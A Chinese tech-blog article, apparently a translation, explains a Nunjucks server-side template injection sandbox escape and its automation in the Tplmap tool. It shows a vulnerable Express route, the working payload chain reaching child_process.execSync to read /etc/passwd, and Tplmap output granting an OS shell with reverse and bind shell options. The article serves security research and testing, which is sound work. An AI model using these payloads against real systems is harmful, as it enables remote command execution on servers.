当前位置: 开发笔记 > 编程语言 > 正文

使用Tplmap对Nunjucks模板引擎进行服务端的模板注入

作者：等了哭了累了55 | 来源：互联网 | 2023-10-11 20:52

介绍

本文描述的是一种沙箱逃逸技术，这是一种用于发动服务器端模板注入攻击(SSTI)的工具，Tplmap在Nunjucks模板引擎上实现了这种技术,并且成功地让操作系统执行了远程命令。感谢Andrea在分析过程中对我的帮助。

Tplmap

Tplmap(Template Mapper)是一种自动化工具,可以检测和利用服务器端模板注入漏洞(SSTI)。它可以协助SSTI利用使应用程序妥协, 并且让操作系统执行远程命令。

安全研究和渗透测试人员可以使用这种工具来检测和利用漏洞，并研究模板注入缺陷。

Tplmap模板功能可以通过插件进行扩展。这里有几个打破沙箱的方法，来自James Kett的研究：Server-Side Template Injection: RCE For The Modern Web App。

具有高级功能的Tplmap能够在盲注的情况下检测并实现命令的执行。

例子

$ ./tplmap.py -u 'http://www.target.com/app?id=*' [+] Tplmap 0.1 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Found placeholder in GET parameter 'inj' [+] Smarty plugin is testing rendering with tag '{*}' [+] Smarty plugin is testing blind injection [+] Mako plugin is testing rendering with tag '${*}' ... [+] Freemarker plugin is testing blind injection [+] Velocity plugin is testing rendering with tag '#set($c=*)n${c}n' [+] Jade plugin is testing rendering with tag 'n= *n' [+] Jade plugin has confirmed injection with tag 'n= *n' [+] Tplmap identified the following injection point: Engine: Jade Injection: n= *n Context: text OS: darwin Technique: render Capabilities: Code evaluation: yes, Javascript code Shell command execution: yes File write: yes File read: yes Bind and reverse shell: yes [+] Rerun tplmap providing one of the following options: --os-shell or --os-cmd to execute shell commands via the injection --upload LOCAL REMOTE to upload files to the server --download REMOTE LOCAL to download remote files --bind-shell PORT to bind a shell on a port and connect to it --reverse-shell HOST PORT to run a shell back to the attacker's HOST PORT $ ./tplmap.py -u 'http://www.target.com/app?id=*' --os-shell [+] Run commands on the operating system. linux $ whoami www-data linux $ ls -al /etc/passwd -rw-r--r-- 1 root wheel 5925 16 Sep 2015 /etc/passwd linux $

NUNJUCKS

Nunjucks是一种模板引擎，用于在Express和Express这类Node.js web框架上开发web应用程序。下面的Connect应用片段来自于一个web页面(http://localhost:15004/page?name=John),其中存在着服务器端模板注入漏洞。

app.use('/page', function(req, res){ if(req.url) { var url_parts = url.parse(req.url, true); var name = url_parts.query.name; // Include user-input in the template var template = 'Hello ' + name + '!'; rendered = nunjucks.renderString( str = template ); res.end(rendered); } });

用户可控的name GET参数被串联到了模板字符串,而不是作为context参数被传递,这就引入了SSTI漏洞。通过注入一个基本操作，这种含有漏洞的参数就能被探测到。

$ curl -g 'http://localhost:15004/page?name={{7*7}}' Hello 49

这种漏洞不会影响到Nunjucks本身,但是当用户的输入被直接串联到一个模板时，漏洞会被引入。

沙箱逃逸

和其他的很多模板引擎一样,Nunjucks模板代码在一个沙箱环境中运行。所有的全局对象都从这种环境中被剥离了出去，这样是为了限制可以被利用来打破沙箱的surface，并执行任意Javascript代码。你可以使用Tplmap的–tpl-shell选项来检查沙盒surface。

从模板里面调用全局对象控制台，这会引发一个尚未定义的异常。

{{console.log(1)}} // Template render error: (unknown path) // Error: Unable to call `console["log"]`, which is undefined or falsey

这里有三个实用函数：range、cycler和joiner，只有它们可以在模板内被调用。

每个函数的constructor性质就是Function constructor，它能够从body字符串开始，创建一个新的函数。

{{range.constructor("console.log(123)")()}} // 123

上面的代码得到了正确的评估。但是，在没有引发异常的时候，require()不能被用于输入标准模块，因此操作系统访问出现了问题。

{{range.constructor("return require('fs')")()}} //Template render error: (unknown path) // ReferenceError: require is not defined 使用global.process.mainModule.require可以绕过require 约束。在下面的代码片段中, fs模块被导入并输出了。 {{range.constructor("return global.process.mainModule.require('fs')")()}} [object Object]

最后, 经由child_process.execSync()方法，用于访问底层操作系统的利用可以通过执行tail /etc/passwd来完成。

{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}} root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh

TPLMAP集成

这种沙箱逃逸技术已经被集成在了Tplmap Nunjucks插件中，可以用完全自动的方式使目标妥协。

$ ./tplmap.py -u http://localhost:15004/page?name=* --engine Nunjucks --os-shell [+] Tplmap 0.1 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Found placeholder in GET parameter 'name' [+] Nunjucks plugin is testing rendering with tag '{{*}}' [+] Nunjucks plugin has confirmed injection with tag '{{*}}' [+] Tplmap identified the following injection point: Engine: Nunjucks Injection: {{*}} Context: text OS: linux Technique: render Capabilities: Code evaluation: yes, Javascript code Shell command execution: yes File write: yes File read: yes Bind and reverse shell: yes [+] Run commands on the operating system linux $ tail /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh

支持新模板引擎的Tplmap可以很容易地通过编写插件进行扩展。所有的内容，包括代码和新模板引擎上的沙箱逃逸这个点子，都受到了极大的赞赏。

推荐阅读

http
如何用UE4制作2D游戏文档——计算篇

篇首语：本文由编程笔记#小编为大家整理，主要介绍了如何用UE4制作2D游戏文档——计算篇相关的知识，希望对你有一定的参考价值。 ... [详细]

蜡笔小新 2023-12-14 09:50:34
http
Tomcat/Jetty为何选择扩展线程池而不是使用JDK原生线程池？

本文探讨了Tomcat和Jetty选择扩展线程池而不是使用JDK原生线程池的原因。通过比较IO密集型任务和CPU密集型任务的特点，解释了为何Tomcat和Jetty需要扩展线程池来提高并发度和任务处理速度。同时，介绍了JDK原生线程池的工作流程。 ... [详细]

蜡笔小新 2023-12-13 16:18:09
http
Webmin远程命令执行漏洞复现及防护方法

本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法，同时提供了防护方法。漏洞存在于Webmin的找回密码页面中，攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外，还指出了参考链接中的数据包不准确的问题，并解释了漏洞触发的条件。最后，给出了防护方法以避免受到该漏洞的攻击。 ... [详细]

蜡笔小新 2023-12-13 16:14:53
http
flowable工作流流程变量_信也科技工作流平台的技术实践

1背景随着公司业务发展及内部业务流程诉求的增长,目前信息化系统不能够很好满足期望,主要体现如下：目前OA流程引擎无法满足企业特定业务流程需求，且移动端体 ... [详细]

蜡笔小新 2023-12-13 10:17:15
main
go利用(*interface{})(nil)传递参数类型的原理及应用

本文介绍了在go语言中利用(*interface{})(nil)传递参数类型的原理及应用。通过分析Martini框架中的injector类型的声明，解释了values映射表的作用以及parent Injector的含义。同时，讨论了该技术在实际开发中的应用场景。 ... [详细]

蜡笔小新 2023-12-10 11:37:12
sum
使用FLASK REST API的机器学习模型

在本教程中，我们将看到如何使用FLASK制作第一个用于机器学习模型的RESTAPI。我们将从创建机器学习模型开始。然后，我们将看到使用Flask创建AP ... [详细]

蜡笔小新 2023-10-17 19:13:12
sum
eBPF和WebAssembly：云原生VM的比较及应用领域

本文比较了eBPF和WebAssembly作为云原生VM的特点和应用领域。eBPF作为运行在Linux内核中的轻量级代码执行沙箱，适用于网络或安全相关的任务；而WebAssembly作为图灵完备的语言，在商业应用中具有优势。同时，介绍了WebAssembly在Linux内核中运行的尝试以及基于LLVM的云原生WebAssembly编译器WasmEdge Runtime的案例，展示了WebAssembly作为原生应用程序的潜力。 ... [详细]

蜡笔小新 2023-12-14 21:27:37
request
postman测试登录后的接口_使用postman进行接口测试的方法(测试用户管理模块)

本文介绍了使用postman进行接口测试的方法，以测试用户管理模块为例。首先需要下载并安装postman，然后创建基本的请求并填写用户名密码进行登录测试。接下来可以进行用户查询和新增的测试。在新增时，可以进行异常测试，包括用户名超长和输入特殊字符的情况。通过测试发现后台没有对参数长度和特殊字符进行检查和过滤。 ... [详细]

蜡笔小新 2023-12-14 10:29:45
request
JavaScript设计模式之策略模式（Strategy Pattern）的优势及应用

本文介绍了JavaScript设计模式之策略模式（Strategy Pattern）的定义和优势，策略模式可以避免代码中的多重判断条件，体现了开放-封闭原则。同时，策略模式的应用可以使系统的算法重复利用，避免复制粘贴。然而，策略模式也会增加策略类的数量，违反最少知识原则，需要了解各种策略类才能更好地应用于业务中。本文还以员工年终奖的计算为例，说明了策略模式的应用场景和实现方式。 ... [详细]

蜡笔小新 2023-12-14 09:31:45
text
XML介绍与使用的概述及标签规则

本文介绍了XML的基本概念和用途，包括XML的可扩展性和标签的自定义特性。同时还详细解释了XML标签的规则，包括标签的尖括号和合法标识符的组成，标签必须成对出现的原则以及特殊标签的使用方法。通过本文的阅读，读者可以对XML的基本知识有一个全面的了解。 ... [详细]

蜡笔小新 2023-12-13 17:39:50
main
Java学习笔记之面向对象编程（OOP）

本文介绍了Java学习笔记中的面向对象编程（OOP）内容，包括OOP的三大特性（封装、继承、多态）和五大原则（单一职责原则、开放封闭原则、里式替换原则、依赖倒置原则）。通过学习OOP，可以提高代码复用性、拓展性和安全性。 ... [详细]

蜡笔小新 2023-12-13 08:44:30
config
Spring常用注解（绝对经典），全靠这份Java知识点PDF大全

本文介绍了Spring常用注解和注入bean的注解，包括@Bean、@Autowired、@Inject等，同时提供了一个Java知识点PDF大全的资源链接。其中详细介绍了ColorFactoryBean的使用，以及@Autowired和@Inject的区别和用法。此外，还提到了@Required属性的配置和使用。 ... [详细]

蜡笔小新 2023-12-12 10:15:07
config
vue cli 3.x移除console采坑记

本文记录了在vue cli 3.x中移除console的一些采坑经验，通过使用uglifyjs-webpack-plugin插件，在vue.config.js中进行相关配置，包括设置minimizer、UglifyJsPlugin和compress等参数，最终成功移除了console。同时，还包括了一些可能出现的报错情况和解决方法。 ... [详细]

蜡笔小新 2023-12-11 21:16:05
config
自动化测试项目失败的原因及调查结果

本文介绍了自动化测试专家Elfriede Dustin在2008年的文章中讨论了自动化测试项目失败的原因。同时，引用了IDT在2007年进行的一次软件自动化测试的研究调查结果，调查显示很多公司认为自动化测试很有用，但很少有公司成功实施。调查结果表明，缺乏资源是导致自动化测试失败的主要原因，其中37%的人认为缺乏时间。 ... [详细]

蜡笔小新 2023-12-11 19:03:08
request
ShiftLeft：将静态防护与运行时防护结合的持续性安全防护解决方案

ShiftLeft公司是一家致力于将应用的静态防护和运行时防护与应用开发自动化工作流相结合以提升软件开发生命周期中的安全性的公司。传统的安全防护方式存在误报率高、人工成本高、耗时长等问题，而ShiftLeft提供的持续性安全防护解决方案能够解决这些问题。通过将下一代静态代码分析与应用开发自动化工作流中涉及的安全工具相结合，ShiftLeft帮助企业实现DevSecOps的安全部分，提供高效、准确的安全能力。 ... [详细]

蜡笔小新 2023-12-10 10:45:15

等了哭了累了55

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章